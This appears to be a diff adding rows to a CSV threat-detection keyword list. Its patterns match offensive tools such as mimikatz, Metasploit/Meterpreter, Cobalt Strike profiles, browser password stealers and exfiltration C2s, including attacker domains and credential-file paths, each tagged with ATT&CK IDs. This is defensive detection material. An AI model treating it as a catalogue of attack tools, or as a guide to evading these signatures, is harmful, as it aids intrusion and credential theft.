+"*Meterpreter.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*meterpreter.sl*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z"
+"*meterpreter_*.rb","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*meterpreter_loader*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*METERPRETER_STAGER*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*MeteTool*","offensive_tool_keyword","MeteTool","Metatool Minetest mod provides API for registering metadata manipulation tools and other tools primarily focused on special node data operations.","T1059.003 - T1064 - T1135 - T1059.007","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/S-S-X/metatool","1","0","N/A","N/A","1","2","1","2023-06-10T06:24:14Z","2020-05-09T19:09:17Z"
+"*methodHash*528465795*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z"
+"*methods::dns::dns_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*methods::https::https_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*methods::icmp::icmp_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"*Metro-Holografix/CSExec*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,,
+"*Metro-Holografix/Dinjector*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,,
+"*metsrv.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z"
+"*metterpreter*","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","1","N/A","N/A","10","1555","675","2023-10-04T11:56:37Z","2014-04-03T21:18:24Z"
+"*MFASweep.ps1*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z"
+"*mgeeky/PackMyPayload*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z"
+"*mgeeky/RedWarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z"
+"*mhaskar/Octopus*","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z"
+"*mhngpdlhojliikfknhfaglpnddniijfh*","greyware_tool_keyword","WorkingVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*mhuzaifi0604/spellbound*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
+"*mhydeath.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z"
+"*mhydeath-master*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z"
+"*micahvandeusen/gMSADumper*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z"
+"*micr0 shell.py*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z"
+"*micr0_shell-main*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z"
+"*micr0shell.py *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z"
+"*microbrownys.strangled.net*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*MicroBurst.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*MicroBurst-Az.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*MicroBurst-AzureAD*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*MicroBurst-AzureREST*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*MicroBurst-AzureRM*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*MicroBurst-master*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*MicroBurst-Misc.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - 
TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*MicroBurst-MSOL*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*microchsse.strangled.net*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*microlilics.crabdance.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*micronaoko.jumpingcrab.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*microplants.strangled.net*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection 
capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*microsoft-edge/cookies.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*microsoft-edge/credit_cards.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*microsoft-edge/history.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*microsoft-edge/login_data.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential 
Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*microsoft-edge\cookies.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*microsoft-edge\credit_cards.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*microsoft-edge\history.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*microsoft-edge\login_data.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*microsploit.git*","offensive_tool_keyword","BruteSploit","Fast and easy create 
backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z"
+"*Midl2Bytes.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z"
+"*--mifi-username * --mifi-password * --number +*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z"
+"*MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z"
+"*MIIEoQIBAAKCAQEArJqP/6XFBa88x/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z"
+"*MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z"
+"*mimi32.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*mimi64.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*mimidrv (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*mimidrv*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*mimidrv.pdb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*mimidrv.sys*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
